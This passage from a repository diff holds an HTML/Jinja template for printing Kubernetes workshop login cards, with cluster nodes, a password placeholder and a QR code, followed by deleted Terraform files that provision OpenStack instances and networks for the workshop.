font-size: 15px;
font-family: 'Slabo 27px';
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
{% if backside %}
height: 33%;
{% endif %}
/* columns * (width+left+right) < 100% */
/*
width: 24.8%;
*/
/**/
width: 33%;
/**/
}
p {
margin: 0.8em;
}
div.back {
border: 1px dotted grey;
}
span.scale {
white-space: nowrap;
}
img.logo {
height: 4.5em;
float: right;
}
img.bottom {
height: 2.5em;
display: block;
margin: 0.5em auto;
}
.qrcode img {
width: 40%;
margin: 1em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 0;
}
</style>
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
}
function scale() {
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
{% if img_logo_src %}
<img class="logo" src="{{ img_logo_src }}" />
{% endif %}
<table>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>
<p>
{% if url %}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
{% if img_bottom_src %}
<img class="bottom" src="{{ img_bottom_src }}" />
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="back">
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>
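Since the header comment of this template says that any variable from settings.yaml is exposed here, the defaults above can be overridden with entries such as these (values illustrative):
url: https://container.training/
event: Kubernetes workshop
lang: en
backside: True
qrcode: True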

@@ -1,5 +0,0 @@
resource "openstack_compute_keypair_v2" "ssh_deploy_key" {
name = "${var.prefix}"
public_key = "${file("~/.ssh/id_rsa.pub")}"
}

@@ -1,32 +0,0 @@
resource "openstack_compute_instance_v2" "machine" {
count = "${var.count}"
name = "${format("%s-%04d", "${var.prefix}", count.index+1)}"
image_name = "Ubuntu 16.04.5 (Xenial Xerus)"
flavor_name = "${var.flavor}"
security_groups = ["${openstack_networking_secgroup_v2.full_access.name}"]
key_pair = "${openstack_compute_keypair_v2.ssh_deploy_key.name}"
network {
name = "${openstack_networking_network_v2.internal.name}"
fixed_ip_v4 = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
}
resource "openstack_compute_floatingip_v2" "machine" {
count = "${var.count}"
# This is something provided to us by Enix when our tenant was provisioned.
pool = "Public Floating"
}
resource "openstack_compute_floatingip_associate_v2" "machine" {
count = "${var.count}"
floating_ip = "${openstack_compute_floatingip_v2.machine.*.address[count.index]}"
instance_id = "${openstack_compute_instance_v2.machine.*.id[count.index]}"
fixed_ip = "${cidrhost("${openstack_networking_subnet_v2.internal.cidr}", count.index+10)}"
}
output "ip_addresses" {
value = "${join("\n", openstack_compute_floatingip_v2.machine.*.address)}"
}
variable "flavor" {}

@@ -1,23 +0,0 @@
resource "openstack_networking_network_v2" "internal" {
name = "${var.prefix}"
}
resource "openstack_networking_subnet_v2" "internal" {
name = "${var.prefix}"
network_id = "${openstack_networking_network_v2.internal.id}"
cidr = "10.10.0.0/16"
ip_version = 4
dns_nameservers = ["1.1.1.1"]
}
resource "openstack_networking_router_v2" "router" {
name = "${var.prefix}"
external_network_id = "15f0c299-1f50-42a6-9aff-63ea5b75f3fc"
}
resource "openstack_networking_router_interface_v2" "router_internal" {
router_id = "${openstack_networking_router_v2.router.id}"
subnet_id = "${openstack_networking_subnet_v2.internal.id}"
}

@@ -1,13 +0,0 @@
provider "openstack" {
user_name = "${var.user}"
tenant_name = "${var.tenant}"
domain_name = "${var.domain}"
password = "${var.password}"
auth_url = "${var.auth_url}"
}
variable "user" {}
variable "tenant" {}
variable "domain" {}
variable "password" {}
variable "auth_url" {}

Some files were not shown because too many files have changed in this diff.